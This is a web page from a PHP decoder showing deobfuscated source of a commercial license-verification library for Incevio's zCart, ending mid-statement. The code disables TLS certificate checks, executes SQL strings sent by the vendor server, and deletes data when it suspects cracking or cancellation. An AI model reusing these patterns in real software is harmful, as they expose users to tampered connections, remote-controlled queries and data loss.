Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* * Copyright (C) Incevio Systems, Inc - All Rights Reserved * Unauthorized copy..

Decoded Output download

<?php 
/* 
* Copyright (C) Incevio Systems, Inc - All Rights Reserved 
* Unauthorized copying of this file, via any medium is strictly prohibited 
* Proprietary and confidential 
* Written by Munna Khan <[email protected]>, September 2018 
*/ 
 function aplCustomEncrypt($string, $key) { $encrypted_string = null; if (!(!empty($string) && !empty($key))) { goto spiDi; } $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length("aes-256-cbc")); $encrypted_string = openssl_encrypt($string, "aes-256-cbc", $key, 0, $iv); $encrypted_string = base64_encode($encrypted_string . "::" . $iv); spiDi: return $encrypted_string; } function aplCustomDecrypt($string, $key) { $decrypted_string = null; if (!(!empty($string) && !empty($key))) { goto SoK2Z; } $string = base64_decode($string); if (!stristr($string, "::")) { goto NwDxh; } $string_iv_array = explode("::", $string, 2); if (!(!empty($string_iv_array) && count($string_iv_array) == 2)) { goto RFv61; } list($encrypted_string, $iv) = $string_iv_array; $decrypted_string = openssl_decrypt($encrypted_string, "aes-256-cbc", $key, 0, $iv); RFv61: NwDxh: SoK2Z: return $decrypted_string; } function aplValidateIntegerValue($number, $min_value = 0, $max_value = INF) { $result = false; if (!(!is_float($number) && filter_var($number, FILTER_VALIDATE_INT, array("options" => array("min_range" => $min_value, "max_range" => $max_value))) !== false)) { goto SsVeN; } $result = true; SsVeN: return $result; } function aplValidateRawDomain($url) { $result = false; if (empty($url)) { goto WAbZj; } if (preg_match("/^[a-z0-9-.]+\.[a-z\.]{2,7}$/", strtolower($url))) { goto afxTZ; } $result = false; goto s2s07; afxTZ: $result = true; s2s07: WAbZj: return $result; } function aplGetCurrentUrl($remove_last_slash = null) { $protocol = "http"; $host = null; $script = null; $params = null; $current_url = null; if (!(isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] == "https")) { goto lUaDr; } $protocol = "https"; lUaDr: if (!isset($_SERVER["HTTP_HOST"])) { goto lulfT; } $host = $_SERVER["HTTP_HOST"]; lulfT: if (!isset($_SERVER["SCRIPT_NAME"])) { goto oGFBW; } $script = $_SERVER["SCRIPT_NAME"]; oGFBW: if (!isset($_SERVER["QUERY_STRING"])) { goto y9zX4; } $params = $_SERVER["QUERY_STRING"]; y9zX4: if (!(!empty($protocol) && !empty($host) && !empty($script))) { goto zPxl_; } $current_url = $protocol . "://" . $host . $script; if (empty($params)) { goto SZ3So; } $current_url .= "?" . $params; SZ3So: if (!($remove_last_slash == 1)) { goto FCdZ3; } XQaAn: if (!(substr($current_url, -1) == "/")) { goto tSvoD; } $current_url = substr($current_url, 0, -1); goto XQaAn; tSvoD: FCdZ3: zPxl_: return $current_url; } function aplGetRawDomain($url) { $raw_domain = null; if (empty($url)) { goto XJPI9; } $url_array = parse_url($url); if (!empty($url_array["scheme"])) { goto QQtqq; } $url = "http://" . $url; $url_array = parse_url($url); QQtqq: if (empty($url_array["host"])) { goto PH1qh; } $raw_domain = $url_array["host"]; $raw_domain = trim(str_ireplace("www.", '', filter_var($raw_domain, FILTER_SANITIZE_URL))); PH1qh: XJPI9: return $raw_domain; } function aplGetRootUrl($url, $remove_scheme, $remove_www, $remove_path, $remove_last_slash) { if (!filter_var($url, FILTER_VALIDATE_URL)) { goto OjYei; } $url_array = parse_url($url); $url = str_ireplace($url_array["scheme"] . "://", '', $url); if ($remove_path == 1) { goto PhdUD; } $last_slash_position = strripos($url, "/"); if (!($last_slash_position > 0)) { goto YtJpN; } $url = substr($url, 0, $last_slash_position + 1); YtJpN: goto Gai2C; PhdUD: $first_slash_position = stripos($url, "/"); if (!($first_slash_position > 0)) { goto DSlZb; } $url = substr($url, 0, $first_slash_position + 1); DSlZb: Gai2C: if (!($remove_scheme != 1)) { goto DZHIT; } $url = $url_array["scheme"] . "://" . $url; DZHIT: if (!($remove_www == 1)) { goto PBkE6; } $url = str_ireplace("www.", '', $url); PBkE6: if (!($remove_last_slash == 1)) { goto eXR8C; } Aw2Nh: if (!(substr($url, -1) == "/")) { goto jgUU5; } $url = substr($url, 0, -1); goto Aw2Nh; jgUU5: eXR8C: OjYei: return trim($url); } function aplCustomPost($url, $post_info = null, $refer = null) { $user_agent = "phpmillion cURL"; $connect_timeout = 10; $server_response_array = array(); $formatted_headers_array = array(); if (!(filter_var($url, FILTER_VALIDATE_URL) && !empty($post_info))) { goto wqyO7; } if (!(empty($refer) || !filter_var($refer, FILTER_VALIDATE_URL))) { goto LBeGp; } $refer = $url; LBeGp: $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, $user_agent); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $connect_timeout); curl_setopt($ch, CURLOPT_TIMEOUT, $connect_timeout); curl_setopt($ch, CURLOPT_REFERER, $refer); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_info); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_MAXREDIRS, 10); curl_setopt($ch, CURLOPT_HEADERFUNCTION, function ($curl, $header) use(&$formatted_headers_array) { $len = strlen($header); $header = explode(":", $header, 2); if (!(count($header) < 2)) { goto dL9zV; } return $len; dL9zV: $name = strtolower(trim($header[0])); $formatted_headers_array[$name] = trim($header[1]); return $len; }); $result = curl_exec($ch); $curl_error = curl_error($ch); curl_close($ch); $server_response_array["headers"] = $formatted_headers_array; $server_response_array["error"] = $curl_error; $server_response_array["body"] = $result; wqyO7: return $server_response_array; } function aplVerifyDateTime($datetime, $format) { $result = false; if (!(!empty($datetime) && !empty($format))) { goto ar7NN; } $datetime = DateTime::createFromFormat($format, $datetime); $errors = DateTime::getLastErrors(); if (!($datetime && empty($errors["warning_count"]))) { goto p8k8q; } $result = true; p8k8q: ar7NN: return $result; } function aplGetDaysBetweenDates($date_from, $date_to) { $number_of_days = 0; if (!(aplVerifyDateTime($date_from, "Y-m-d") && aplVerifyDateTime($date_to, "Y-m-d"))) { goto up0Y3; } $date_to = new DateTime($date_to); $date_from = new DateTime($date_from); $number_of_days = $date_from->diff($date_to)->format("%a"); up0Y3: return $number_of_days; } function aplParseXmlTags($content, $tag_name) { $parsed_value = null; if (!(!empty($content) && !empty($tag_name))) { goto o9qce; } preg_match_all("/<" . preg_quote($tag_name, "/") . ">(.*?)<\/" . preg_quote($tag_name, "/") . ">/ims", $content, $output_array, PREG_SET_ORDER); if (empty($output_array[0][1])) { goto UEn0c; } $parsed_value = trim($output_array[0][1]); UEn0c: o9qce: return $parsed_value; } function aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE) { $notifications_array = array(); if (!empty($content_array)) { goto Dlcv2; } $notifications_array["notification_case"] = "notification_no_connection"; $notifications_array["notification_text"] = APL_NOTIFICATION_NO_CONNECTION; goto mI117; Dlcv2: if (!empty($content_array["headers"]["notification_server_signature"]) && aplVerifyServerSignature($content_array["headers"]["notification_server_signature"], $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)) { goto o225P; } $notifications_array["notification_case"] = "notification_invalid_response"; $notifications_array["notification_text"] = APL_NOTIFICATION_INVALID_RESPONSE; goto R640t; o225P: $notifications_array["notification_case"] = $content_array["headers"]["notification_case"]; $notifications_array["notification_text"] = $content_array["headers"]["notification_text"]; if (empty($content_array["headers"]["notification_data"])) { goto zyk98; } $notifications_array["notification_data"] = json_decode($content_array["headers"]["notification_data"], true); zyk98: R640t: mI117: return $notifications_array; } function aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE) { $script_signature = null; $root_ips_array = gethostbynamel(aplGetRawDomain(APL_ROOT_URL)); if (!(!empty($ROOT_URL) && isset($CLIENT_EMAIL) && isset($LICENSE_CODE) && !empty($root_ips_array))) { goto qE70K; } $script_signature = hash("sha256", gmdate("Y-m-d") . $ROOT_URL . $CLIENT_EMAIL . $LICENSE_CODE . APL_PRODUCT_ID . implode('', $root_ips_array)); qE70K: return $script_signature; } function aplVerifyServerSignature($notification_server_signature, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE) { $result = false; $root_ips_array = gethostbynamel(aplGetRawDomain(APL_ROOT_URL)); if (!(!empty($notification_server_signature) && !empty($ROOT_URL) && isset($CLIENT_EMAIL) && isset($LICENSE_CODE) && !empty($root_ips_array))) { goto JM83k; } if (!(hash("sha256", implode('', $root_ips_array) . APL_PRODUCT_ID . $LICENSE_CODE . $CLIENT_EMAIL . $ROOT_URL . gmdate("Y-m-d")) == $notification_server_signature)) { goto cNguZ; } $result = true; cNguZ: JM83k: return $result; } function aplCheckSettings() { $notifications_array = array(); if (!(empty(APL_SALT) || APL_SALT == "some_random_text")) { goto WECwp; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_SALT; WECwp: if (!(!filter_var(APL_ROOT_URL, FILTER_VALIDATE_URL) || !ctype_alnum(substr(APL_ROOT_URL, -1)))) { goto sJsIQ; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_ROOT_URL; sJsIQ: if (filter_var(APL_PRODUCT_ID, FILTER_VALIDATE_INT)) { goto Cgzq0; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_PRODUCT_ID; Cgzq0: if (aplValidateIntegerValue(APL_DAYS, 1, 365)) { goto MjFXX; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_VERIFICATION_PERIOD; MjFXX: if (!(APL_STORAGE != "DATABASE" && APL_STORAGE != "FILE")) { goto WByPf; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_STORAGE; WByPf: if (!(APL_STORAGE == "DATABASE" && !ctype_alnum(str_ireplace(array("_"), '', APL_DATABASE_TABLE)))) { goto vRpQn; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_TABLE; vRpQn: if (!(APL_STORAGE == "FILE" && !@is_writable(APL_DIRECTORY . "/" . APL_LICENSE_FILE_LOCATION))) { goto vezbr; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_LICENSE_FILE; vezbr: if (!(!empty(APL_ROOT_IP) && !filter_var(APL_ROOT_IP, FILTER_VALIDATE_IP))) { goto d58rH; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_ROOT_IP; d58rH: if (!(!empty(APL_ROOT_IP) && !in_array(APL_ROOT_IP, gethostbynamel(aplGetRawDomain(APL_ROOT_URL))))) { goto yAaCY; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_DNS; yAaCY: if (!(defined("APL_ROOT_NAMESERVERS") && !empty(APL_ROOT_NAMESERVERS))) { goto plEh6; } foreach (APL_ROOT_NAMESERVERS as $nameserver) { if (aplValidateRawDomain($nameserver)) { goto CQnfW; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_ROOT_NAMESERVERS; goto QU26y; CQnfW: t7xCd: } QU26y: plEh6: if (!(defined("APL_ROOT_NAMESERVERS") && !empty(APL_ROOT_NAMESERVERS))) { goto oIiS9; } $apl_root_nameservers_array = APL_ROOT_NAMESERVERS; $fetched_nameservers_array = array(); $dns_records_array = dns_get_record(aplGetRawDomain(APL_ROOT_URL), DNS_NS); foreach ($dns_records_array as $record) { $fetched_nameservers_array[] = $record["target"]; XQYuX: } IEo8l: $apl_root_nameservers_array = array_map("strtolower", $apl_root_nameservers_array); $fetched_nameservers_array = array_map("strtolower", $fetched_nameservers_array); sort($apl_root_nameservers_array); sort($fetched_nameservers_array); if (!($apl_root_nameservers_array != $fetched_nameservers_array)) { goto eDJLN; } $notifications_array[] = APL_CORE_NOTIFICATION_INVALID_DNS; eDJLN: oIiS9: return $notifications_array; } function aplParseLicenseFile() { $license_data_array = array(); if (!@is_readable(APL_DIRECTORY . "/" . APL_LICENSE_FILE_LOCATION)) { goto jNOrA; } $file_content = file_get_contents(APL_DIRECTORY . "/" . APL_LICENSE_FILE_LOCATION); preg_match_all("/<([A-Z_]+)>(.*?)<\/([A-Z_]+)>/", $file_content, $matches, PREG_SET_ORDER); if (empty($matches)) { goto LcPwn; } foreach ($matches as $value) { if (!(!empty($value[1]) && $value[1] == $value[3])) { goto LQr0y; } $license_data_array[$value[1]] = $value[2]; LQr0y: X7iCo: } VShgC: LcPwn: jNOrA: return $license_data_array; } function aplGetLicenseData($MYSQLI_LINK = null) { $settings_row = array(); if (!(APL_STORAGE == "DATABASE")) { goto A0xsY; } $settings_results = @mysqli_query($MYSQLI_LINK, "SELECT * FROM " . APL_DATABASE_TABLE); $settings_row = @mysqli_fetch_assoc($settings_results); A0xsY: if (!(APL_STORAGE == "FILE")) { goto LMusW; } $settings_row = aplParseLicenseFile(); LMusW: return $settings_row; } function aplCheckConnection() { $notifications_array = array(); $content_array = aplCustomPost(APL_ROOT_URL . "/apl_callbacks/connection_test.php", "product_id=" . rawurlencode(APL_PRODUCT_ID) . "&connection_hash=" . rawurlencode(hash("sha256", "connection_test"))); if (!empty($content_array)) { goto SSimy; } $notifications_array["notification_case"] = "notification_no_connection"; $notifications_array["notification_text"] = APL_NOTIFICATION_NO_CONNECTION; goto Pxkuz; SSimy: if (!($content_array["body"] != "<connection_test>OK</connection_test>")) { goto NcvQT; } $notifications_array["notification_case"] = "notification_invalid_response"; $notifications_array["notification_text"] = APL_NOTIFICATION_INVALID_RESPONSE; NcvQT: Pxkuz: return $notifications_array; } function aplCheckData($MYSQLI_LINK = null) { $error_detected = 0; $cracking_detected = 0; $data_check_result = false; extract(aplGetLicenseData($MYSQLI_LINK)); if (!(!empty($ROOT_URL) && !empty($INSTALLATION_HASH) && !empty($INSTALLATION_KEY) && !empty($LCD) && !empty($LRD))) { goto psiaF; } $LCD = aplCustomDecrypt($LCD, APL_SALT . $INSTALLATION_KEY); $LRD = aplCustomDecrypt($LRD, APL_SALT . $INSTALLATION_KEY); if (!(!filter_var($ROOT_URL, FILTER_VALIDATE_URL) || !ctype_alnum(substr($ROOT_URL, -1)))) { goto hTeZR; } $error_detected = 1; hTeZR: if (!(filter_var(aplGetCurrentUrl(), FILTER_VALIDATE_URL) && stristr(aplGetRootUrl(aplGetCurrentUrl(), 1, 1, 0, 1), aplGetRootUrl("{$ROOT_URL}/", 1, 1, 0, 1)) === false)) { goto gflsu; } $error_detected = 1; gflsu: if (!(empty($INSTALLATION_HASH) || $INSTALLATION_HASH != hash("sha256", $ROOT_URL . $CLIENT_EMAIL . $LICENSE_CODE))) { goto jw_rZ; } $error_detected = 1; jw_rZ: if (!(empty($INSTALLATION_KEY) || !password_verify($LRD, aplCustomDecrypt($INSTALLATION_KEY, APL_SALT . $ROOT_URL)))) { goto fu05y; } $error_detected = 1; fu05y: if (aplVerifyDateTime($LCD, "Y-m-d")) { goto vhfyn; } $error_detected = 1; vhfyn: if (aplVerifyDateTime($LRD, "Y-m-d")) { goto ztrkL; } $error_detected = 1; ztrkL: if (!(aplVerifyDateTime($LCD, "Y-m-d") && $LCD > date("Y-m-d", strtotime("+1 day")))) { goto WMq3c; } $error_detected = 1; $cracking_detected = 1; WMq3c: if (!(aplVerifyDateTime($LRD, "Y-m-d") && $LRD > date("Y-m-d", strtotime("+1 day")))) { goto Ixfue; } $error_detected = 1; $cracking_detected = 1; Ixfue: if (!(aplVerifyDateTime($LCD, "Y-m-d") && aplVerifyDateTime($LRD, "Y-m-d") && $LCD > $LRD)) { goto IUzT2; } $error_detected = 1; $cracking_detected = 1; IUzT2: if (!($cracking_detected == 1 && APL_DELETE_CRACKED == "YES")) { goto MNxGh; } aplDeleteData($MYSQLI_LINK); MNxGh: if (!($error_detected != 1 && $cracking_detected != 1)) { goto qC7lr; } $data_check_result = true; qC7lr: psiaF: return $data_check_result; } function aplVerifyEnvatoPurchase($LICENSE_CODE = null) { $notifications_array = array(); $content_array = aplCustomPost(APL_ROOT_URL . "/apl_callbacks/verify_envato_purchase.php", "product_id=" . rawurlencode(APL_PRODUCT_ID) . "&license_code=" . rawurlencode($LICENSE_CODE) . "&connection_hash=" . rawurlencode(hash("sha256", "verify_envato_purchase"))); if (!empty($content_array)) { goto STv1n; } $notifications_array["notification_case"] = "notification_no_connection"; $notifications_array["notification_text"] = APL_NOTIFICATION_NO_CONNECTION; goto mFbQa; STv1n: if (!($content_array["body"] != "<verify_envato_purchase>OK</verify_envato_purchase>")) { goto o6z8s; } $notifications_array["notification_case"] = "notification_invalid_response"; $notifications_array["notification_text"] = APL_NOTIFICATION_INVALID_RESPONSE; o6z8s: mFbQa: return $notifications_array; } function incevioVerify($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE, $MYSQLI_LINK = null) { $notifications_array = array(); $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto A5K8R; } $notifications_array["notification_case"] = "notification_script_corrupted"; $notifications_array["notification_text"] = implode("; ", $apl_core_notifications); goto WF85x; A5K8R: if (!empty(aplGetLicenseData($MYSQLI_LINK)) && is_array(aplGetLicenseData($MYSQLI_LINK))) { goto rvTJZ; } $INSTALLATION_HASH = hash("sha256", $ROOT_URL . $CLIENT_EMAIL . $LICENSE_CODE); $post_info = "product_id=" . rawurlencode(APL_PRODUCT_ID) . "&client_email=" . rawurlencode($CLIENT_EMAIL) . "&license_code=" . rawurlencode($LICENSE_CODE) . "&root_url=" . rawurlencode($ROOT_URL) . "&installation_hash=" . rawurlencode($INSTALLATION_HASH) . "&license_signature=" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = aplCustomPost(APL_ROOT_URL . "/apl_callbacks/license_install.php", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); if (!($notifications_array["notification_case"] == "notification_license_ok")) { goto n9SgU; } $INSTALLATION_KEY = aplCustomEncrypt(password_hash(date("Y-m-d"), PASSWORD_DEFAULT), APL_SALT . $ROOT_URL); $LCD = aplCustomEncrypt(date("Y-m-d", strtotime("-" . APL_DAYS . " days")), APL_SALT . $INSTALLATION_KEY); $LRD = aplCustomEncrypt(date("Y-m-d"), APL_SALT . $INSTALLATION_KEY); if (!(APL_STORAGE == "DATABASE")) { goto cWAxH; } $content_array = aplCustomPost(APL_ROOT_URL . "/apl_callbacks/license_scheme.php", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); if (!(!empty($notifications_array["notification_data"]) && !empty($notifications_array["notification_data"]["scheme_query"]))) { goto Q4ktB; } $mysql_bad_array = array("%APL_DATABASE_TABLE%", "%ROOT_URL%", "%CLIENT_EMAIL%", "%LICENSE_CODE%", "%LCD%", "%LRD%", "%INSTALLATION_KEY%", "%INSTALLATION_HASH%"); $mysql_good_array = array(APL_DATABASE_TABLE, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE, $LCD, $LRD, $INSTALLATION_KEY, $INSTALLATION_HASH); $license_scheme = str_replace($mysql_bad_array, $mysql_good_array, $notifications_array["notification_data"]["scheme_query"]); mysqli_multi_query($MYSQLI_LINK, $license_scheme) or die(mysqli_error($MYSQLI_LINK)); Q4ktB: cWAxH: if (!(APL_STORAGE == "FILE")) { goto xh4dk; } $handle = @fopen(APL_DIRECTORY . "/" . APL_LICENSE_FILE_LOCATION, "w+"); $fwrite = @fwrite($handle, "<ROOT_URL>{$ROOT_URL}</ROOT_URL><CLIENT_EMAIL>{$CLIENT_EMAIL}</CLIENT_EMAIL><LICENSE_CODE>{$LICENSE_CODE}</LICENSE_CODE><LCD>{$LCD}</LCD><LRD>{$LRD}</LRD><INSTALLATION_KEY>{$INSTALLATION_KEY}</INSTALLATION_KEY><INSTALLATION_HASH>{$INSTALLATION_HASH}</INSTALLATION_HASH>"); if (!($fwrite === false)) { goto m8aO8; } echo APL_NOTIFICATION_LICENSE_FILE_WRITE_ERROR; exit; m8aO8: @fclose($handle); xh4dk: n9SgU: goto Z1XBe; rvTJZ: $notifications_array["notification_case"] = "notification_already_installed"; $notifications_array["notification_text"] = APL_NOTIFICATION_SCRIPT_ALREADY_INSTALLED; Z1XBe: WF85x: return $notifications_array; } function incevioAutoloadHelpers($MYSQLI_LINK = null, $FORCE_VERIFICATION = 0) { $notifications_array = array(); $update_lrd_value = 0; $update_lcd_value = 0; $updated_records = 0; $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto BAzw4; } $notifications_array["notification_case"] = "notification_script_corrupted"; $notifications_array["notification_text"] = implode("; ", $apl_core_notifications); goto Ze0i3; BAzw4: if (aplCheckData($MYSQLI_LINK)) { goto w1Fsj; } $notifications_array["notification_case"] = "notification_license_corrupted"; $notifications_array["notification_text"] = APL_NOTIFICATION_LICENSE_CORRUPTED; goto YnG1E; w1Fsj: extract(aplGetLicenseData($MYSQLI_LINK)); if (aplGetDaysBetweenDates(aplCustomDecrypt($LCD, APL_SALT . $INSTALLATION_KEY), date("Y-m-d")) < APL_DAYS && aplCustomDecrypt($LCD, APL_SALT . $INSTALLATION_KEY) <= date("Y-m-d") && aplCustomDecrypt($LRD, APL_SALT . $INSTALLATION_KEY) <= date("Y-m-d") && $FORCE_VERIFICATION === 0) { goto lNRwm; } $post_info = "product_id=" . rawurlencode(APL_PRODUCT_ID) . "&client_email=" . rawurlencode($CLIENT_EMAIL) . "&license_code=" . rawurlencode($LICENSE_CODE) . "&root_url=" . rawurlencode($ROOT_URL) . "&installation_hash=" . rawurlencode($INSTALLATION_HASH) . "&license_signature=" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = aplCustomPost(APL_ROOT_URL . "/apl_callbacks/license_verify.php", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); if (!($notifications_array["notification_case"] == "notification_license_ok")) { goto En1L9; } $update_lcd_value = 1; En1L9: if (!($notifications_array["notification_case"] == "notification_license_cancelled" && APL_DELETE_CANCELLED == "YES")) { goto gRgCx; } aplDeleteData($MYSQLI_LINK); gRgCx: goto ezYJy; lNRwm: $notifications_array["notification_case"] = "notification_license_ok"; $notifications_array["notification_text"] = APL_NOTIFICATION_BYPASS_VERIFICATION; ezYJy: if (!(aplCustomDecrypt($LRD, APL_SALT . $INSTALLATION_KEY) < date("Y-m-d"))) { goto BwvEk; } $update_lrd_value = 1; BwvEk: if (!($update_lrd_value == 1 || $update_lcd_value == 1)) { goto BWIr8; } if ($update_lcd_value == 1) { goto mGLAB; } $LCD = aplCustomDecrypt($LCD, APL_SALT . $INSTALLATION_KEY); goto LAo33; mGLAB: $LCD = date("Y-m-d"); LAo33: $INSTALLATION_KEY = aplCustomEncrypt(password_hash(date("Y-m-d"), PASSWORD_DEFAULT), APL_SALT . $ROOT_URL); $LCD = aplCustomEncrypt($LCD, APL_SALT . $INSTALLATION_KEY); $LRD = aplCustomEncrypt(date("Y-m-d"), APL_SALT . $INSTALLATION_KEY); if (!(APL_STORAGE == "DATABASE")) { goto yM9Se; } $stmt = mysqli_prepare($MYSQLI_LINK, "UPDATE " . APL_DATABASE_TABLE . " SET LCD=?, LRD=?, INSTALLATION_KEY=?"); if (!$stmt) { goto HS3Qj; } mysqli_stmt_bind_param($stmt, "sss", $LCD, $LRD, $INSTALLATION_KEY); $exec = mysqli_stmt_execute($stmt); $affected_rows = mysqli_stmt_affected_rows($stmt); if (!($affected_rows > 0)) { goto WaIA2; } $updated_records = $updated_records + $affected_rows; WaIA2: mysqli_stmt_close($stmt); HS3Qj: if (!($updated_records < 1)) { goto tHiY8; } echo APL_NOTIFICATION_DATABASE_WRITE_ERROR; exit; tHiY8: yM9Se: if (!(APL_STORAGE == "FILE")) { goto HDm_R; } $handle = @fopen(APL_DIRECTORY . "/" . APL_LICENSE_FILE_LOCATION, "w+"); $fwrite = @fwrite($handle, "<ROOT_URL>{$ROOT_URL}</ROOT_URL><CLIENT_EMAIL>{$CLIENT_EMAIL}</CLIENT_EMAIL><LICENSE_CODE>{$LICENSE_CODE}</LICENSE_CODE><LCD>{$LCD}</LCD><LRD>{$LRD}</LRD><INSTALLATION_KEY>{$INSTALLATION_KEY}</INSTALLATION_KEY><INSTALLATION_HASH>{$INSTALLATION_HASH}</INSTALLATION_HASH>"); if (!($fwrite === false)) { goto KkJDu; } echo APL_NOTIFICATION_LICENSE_FILE_WRITE_ERROR; exit; KkJDu: @fclose($handle); HDm_R: BWIr8: YnG1E: Ze0i3: if (!($notifications_array["notification_case"] != "notification_license_ok")) { goto Dcrny; } echo "License is not" . " installed yet" . " or corrupted. Please contact" . " zCart team at " . "help" . "@" . "incevio.com"; exit; Dcrny: return $notifications_array; } function aplVerifySupport($MYSQLI_LINK = null) { $notifications_array = array(); $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto UD0H2; } $notifications_array["notification_case"] = "notification_script_corrupted"; $notifications_array["notification_text"] = implode("; ", $apl_core_notifications); goto zLVav; UD0H2: if (aplCheckData($MYSQLI_LINK)) { goto uO_EY; } $notifications_array["notification_case"] = "notification_license_corrupted"; $notifications_array["notification_text"] = APL_NOTIFICATION_LICENSE_CORRUPTED; goto xu0W7; uO_EY: extract(aplGetLicenseData($MYSQLI_LINK)); $post_info = "product_id=" . rawurlencode(APL_PRODUCT_ID) . "&client_email=" . rawurlencode($CLIENT_EMAIL) . "&license_code=" . rawurlencode($LICENSE_CODE) . "&root_url=" . rawurlencode($ROOT_URL) . "&installation_hash=" . rawurlencode($INSTALLATION_HASH) . "&license_signature=" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = aplCustomPost(APL_ROOT_URL . "/apl_callbacks/license_support.php", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); xu0W7: zLVav: return $notifications_array; } function aplVerifyUpdates($MYSQLI_LINK = null) { $notifications_array = array(); $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto dntAa; } $notifications_array["notification_case"] = "notification_script_corrupted"; $notifications_array["notification_text"] = implode("; ", $apl_core_notifications); goto diR0y; dntAa: if (aplCheckData($MYSQLI_LINK)) { goto XdgXu; } $notifications_array["notification_case"] = "notification_license_corrupted"; $notifications_array["notification_text"] = APL_NOTIFICATION_LICENSE_CORRUPTED; goto QO4f_; XdgXu: extract(aplGetLicenseData($MYSQLI_LINK)); $post_info = "product_id=" . rawurlencode(APL_PRODUCT_ID) . "&client_email=" . rawurlencode($CLIENT_EMAIL) . "&license_code=" . rawurlencode($LICENSE_CODE) . "&root_url=" . rawurlencode($ROOT_URL) . "&installation_hash=" . rawurlencode($INSTALLATION_HASH) . "&license_signature=" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = aplCustomPost(APL_ROOT_URL . "/apl_callbacks/license_updates.php", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); QO4f_: diR0y: return $notifications_array; } function incevioUpdateLicense($MYSQLI_LINK = null) { $notifications_array = array(); $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto ADG_D; } $notifications_array["notification_case"] = "notification_script_corrupted"; $notifications_array["notification_text"] = implode("; ", $apl_core_notifications); goto ILQ0t; ADG_D: if (aplCheckData($MYSQLI_LINK)) { goto XHyJE; } $notifications_array["notification_case"] = "notification_license_corrupted"; $notifications_array["notification_text"] = APL_NOTIFICATION_LICENSE_CORRUPTED; goto PstU0; XHyJE: extract(aplGetLicenseData($MYSQLI_LINK)); $post_info = "product_id=" . rawurlencode(APL_PRODUCT_ID) . "&client_email=" . rawurlencode($CLIENT_EMAIL) . "&license_code=" . rawurlencode($LICENSE_CODE) . "&root_url=" . rawurlencode($ROOT_URL) . "&installation_hash=" . rawurlencode($INSTALLATION_HASH) . "&license_signature=" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = aplCustomPost(APL_ROOT_URL . "/apl_callbacks/license_update.php", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); PstU0: ILQ0t: return $notifications_array; } function incevioUninstallLicense($MYSQLI_LINK = null) { $notifications_array = array(); $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto sJJLd; } $notifications_array["notification_case"] = "notification_script_corrupted"; $notifications_array["notification_text"] = implode("; ", $apl_core_notifications); goto ObaEe; sJJLd: if (aplCheckData($MYSQLI_LINK)) { goto TEHK3; } $notifications_array["notification_case"] = "notification_license_corrupted"; $notifications_array["notification_text"] = APL_NOTIFICATION_LICENSE_CORRUPTED; goto HE827; TEHK3: extract(aplGetLicenseData($MYSQLI_LINK)); $post_info = "product_id=" . rawurlencode(APL_PRODUCT_ID) . "&client_email=" . rawurlencode($CLIENT_EMAIL) . "&license_code=" . rawurlencode($LICENSE_CODE) . "&root_url=" . rawurlencode($ROOT_URL) . "&installation_hash=" . rawurlencode($INSTALLATION_HASH) . "&license_signature=" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = 